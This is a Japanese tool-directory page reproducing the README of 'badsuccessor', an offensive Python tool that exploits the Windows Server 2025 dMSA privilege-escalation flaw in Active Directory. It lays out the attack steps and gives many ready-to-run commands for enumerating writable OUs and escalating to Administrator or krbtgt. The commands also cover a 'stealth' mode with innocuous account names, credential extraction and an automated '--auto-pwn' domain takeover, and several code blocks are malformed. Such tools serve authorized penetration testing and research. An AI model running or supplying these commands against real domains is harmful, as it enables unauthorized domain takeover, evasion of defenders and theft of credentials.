Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
badsuccessor — Windows Server 2025のdMSA権限昇格の脆弱性を悪用して、書き込み可能なOUを列挙し、任意のドメインユーザーへ権限昇格し、資格情報を抽出して、許可されたADセキュリティ評価においてドメイン乗っ取りを可能にします。 | Kitploit
ツール/GitHubGitHub/cybrly/badsuccessor
特権昇格偵察永続化メカニズムエクスプロイト横移動情報収集ポストエクスプロイトペネトレーションテストレッドチーミング敵対的攻撃
GitHubcybrly/badsuccessor

badsuccessor

12220201年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Windows Server 2025のdMSA権限昇格の脆弱性を悪用して、書き込み可能なOUを列挙し、任意のドメインユーザーへ権限昇格し、資格情報を抽出して、許可されたADセキュリティ評価においてドメイン乗っ取りを可能にします。

リポジトリを見る

BadSuccessor.py

Windows Server 2025 Active Directory 環境における dMSA(委任管理サービスアカウント)権限昇格の脆弱性を悪用するペネトレーションテストツール。

⚠️ 法的免責事項

このツールは、許可を得たペネトレーションテストおよびセキュリティ研究目的のみで使用すること。 明示的な書面による許可なくシステムに対してこのツールを使用することは、違法かつ非倫理的です。作者は、このツールの誤用または損害について一切の責任を負いません。

⚠️ 開発ステータスおよび環境テストに関する免責事項

重要:このツールは活発に開発およびテスト中です。

現在のステータス

  • Windows Server 2025 の採用状況:2025年5月時点で、Windows Server 2025 はまだ初期採用段階にあり、本番展開は限られています
  • 環境の差異:テストに利用可能な Windows Server 2025 環境が限られているため、このツールは未テストの構成に遭遇する可能性があります
  • 継続的な開発:より多くの環境バリエーションが展開・テストされるにつれて、ツールを積極的に改良しています

これが意味すること

  • アップデートを期待:新しい環境タイプがテストされるにつれて、ツールは頻繁にアップデートされます
  • 問題を報告:フィードバックは非常に重要です。遭遇した問題やエッジケースを報告してください
  • 慎重にテスト:まず非本番環境でテストしてください
  • スキーマの差異:Windows Server 2025 のビルドによって、dMSA 属性の実装方法が異なる場合があります
  • 機能の安定性:コア機能は安定していますが、一部の機能は特定の環境向けに調整が必要な場合があります

追跡中の既知の変数

  • 異なる Windows Server 2025 ビルドバージョン
  • スキーマ属性の命名規則
  • 地域別/ローカライズされた AD 実装
  • ハイブリッドクラウド構成
  • さまざまな AD 機能レベル
  • さまざまなセキュリティ強化構成

コミュニティテスト

セキュリティコミュニティの皆様に以下を推奨します:

  • 多様な環境でのテスト
  • 調査結果の共有(サニタイズ済み)
  • 互換性改善のためのプルリクエストの提出
  • 環境の差異の報告

このツールを使用することにより、本ツールが活発に開発中であり、特定の環境に応じた修正が必要になる可能性があることを承認したものとみなされます。

📋 概要

BadSuccessor は、Windows Server 2025 の委任管理サービスアカウント(dMSA)機能における権限昇格の脆弱性を悪用します。この脆弱性により、最小限の権限しか持たない攻撃者が、ドメイン管理者を含むドメイン内の任意のユーザーへ権限を昇格させることが可能になります。

研究クレジット

このツールは、Akamai Technologies の Yuval Gordon 氏による優れた研究に基づいています:

  • BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory

🎯 脆弱性の詳細

この脆弱性は dMSA 移行プロセスに存在し、以下の手順で発生します:

  1. 攻撃者は任意の書き込み可能な OU に悪意のある dMSA を作成します
  2. msDS-ManagedAccountPrecededByLink または ms-DS-Managed-Account-Preceded-By-Link を対象ユーザーを指すように設定します
  3. msDS-DelegatedMSAState または ms-DS-Delegated-MSA-State を 2(移行完了)に設定します
  4. KDC は PAC 継承を介して、dMSA に対象ユーザーのすべての権限を自動的に付与します

さらに、KERB-DMSA-KEY-PACKAGE 構造には対象ユーザーのパスワードキーが含まれており、資格情報の抽出が可能になります。

✅ 前提条件

システム要件

  • Linux マシン(ドメイン非参加)
  • Python 3.6+
  • 対象 Active Directory 環境へのネットワークアクセス
  • 対象ドメインには少なくとも1台の Windows Server 2025 ドメインコントローラーが必要

Python 依存関係```bash

pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0

**注記**: このツールは impacket 0.12.0 でテストされています。バージョン互換性の警告は実行時に表示されます。

### 任意の依存関係```bash
# For DNS discovery
pip3 install dnspython

# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2

# RHEL/CentOS/Fedora
sudo yum install krb5-devel

必要な権限

  • 有効なドメイン資格情報(任意のユーザーアカウント)
  • 少なくとも1つの組織単位(OU)に対する以下のいずれかの権限:
    • CreateChild 権限
    • Write 権限
    • GenericWrite 権限
    • GenericAll 権限
    • 書き込みアクセスを持つ既定グループのメンバー(例: Authenticated Users)
  • ツールは書き込み可能なすべてのOUを自動的に検出し、具体的な権限を表示します

🚀 インストール```bash

git clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py

### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0

📖 使い方

基本構文```bash

python3 badsuccessor.py -d -u -p [options]

### クイックスタート例

#### 1. ドライラン モード (新機能) - 変更を加えずにテスト```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"

2. 環境を列挙する```bash

Check Windows Server 2025 schema support

python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema

Find ALL writable OUs with detailed permissions

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate

List high-value targets

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets

Validate specific target account

python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator

#### 3. 攻撃を実行```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator

# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30

# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
  --dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
  --dmsa-display-name "Production Service"

# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --dmsa-pattern "svc{random}prod"

4. 認証情報の抽出```bash

Extract credentials for multiple users

python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql

Auto-pwn mode (fully automated)

python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn

#### 5. セッション管理 (新規)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234

# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID

# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all

6. 結果のエクスポート (新規)```bash

Export enumeration results to JSON

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json

Export to CSV

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv

Generate HTML report

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html

Combined operation with exports

python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
--export-json attack_results.json --export-html attack_report.html

### コマンドラインオプション

#### 認証引数
| オプション | 説明 |
|--------|-------------|
| `-d, --domain` | 対象ドメイン(例: corp.local)**[必須]** |
| `-u, --username` | 認証用ユーザー名 **[必須]** |
| `-p, --password` | 認証用パスワード |
| `--dc-ip` | ドメインコントローラのIP(省略時は自動検出) |
| `--ldaps` | ポート636でLDAPS(SSL)接続を強制 |

#### 攻撃モード
| オプション | 説明 |
|--------|-------------|
| `--attack` | BadSuccessor攻撃を実行 |
| `--dry-run` | **新機能**: 変更を行わずに攻撃をシミュレート |
| `--extract-creds` | キーパッケージを使用して資格情報を抽出 |
| `--auto-pwn` | 完全自動化されたドメイン乗っ取り |

#### ターゲット指定
| オプション | 説明 |
|--------|-------------|
| `--target` | 権限を昇格させる対象ユーザー |
| `--targets` | 資格情報抽出のためのユーザー一覧(カンマ区切り) |
| `--validate-target` | **新機能**: 攻撃せずにターゲットアカウントを検証 |

#### dMSA構成
| オプション | 説明 |
|--------|-------------|
| `--dmsa-name` | 悪意のあるdMSAの名前(未指定の場合は自動生成) |
| `--dmsa-pattern` | **新機能**: dMSA命名のパターン(例: "svc{random}{target}") |
| `--ou-dn` | 使用する特定のOU DN(未指定の場合は自動検出) |
| `--dmsa-description` | **新機能**: 作成するdMSAの説明 |
| `--dmsa-display-name` | **新機能**: 作成するdMSAの表示名 |

#### 列挙オプション
| オプション | 説明 |
|--------|-------------|
| `--enumerate` | 任意の書き込み権限を持つOUを列挙 |
| `--list-targets` | 高価値ターゲットを一覧表示 |
| `--check-schema` | Windows Server 2025スキーマを検証 |

#### セッション管理(新機能)
| オプション | 説明 |
|--------|-------------|
| `--session-id` | 既存のセッションを再開 |
| `--list-sessions` | 利用可能な全セッションを一覧表示 |
| `--cleanup-session SESSION_ID` | セッションからすべてのdMSAをクリーンアップ |

#### クリーンアップオプション
| オプション | 説明 |
|--------|-------------|
| `--cleanup` | 作成したdMSAを削除 |
| `--dmsa-dn` | クリーンアップ操作のためのdMSA DN |
| `--cleanup-all` | **新機能**: 現在のセッションからすべてのdMSAをクリーンアップ |

#### 出力オプション
| オプション | 説明 |
|--------|-------------|
| `--export-json FILE` | **新機能**: 結果をJSONファイルにエクスポート |
| `--export-csv FILE` | **新機能**: 結果をCSVファイルにエクスポート |
| `--export-html FILE` | **新機能**: HTMLレポートを生成 |
| `--no-banner` | バナー出力を抑制 |
| `--verbose` | 詳細出力を有効化 |
ツールをダウンロード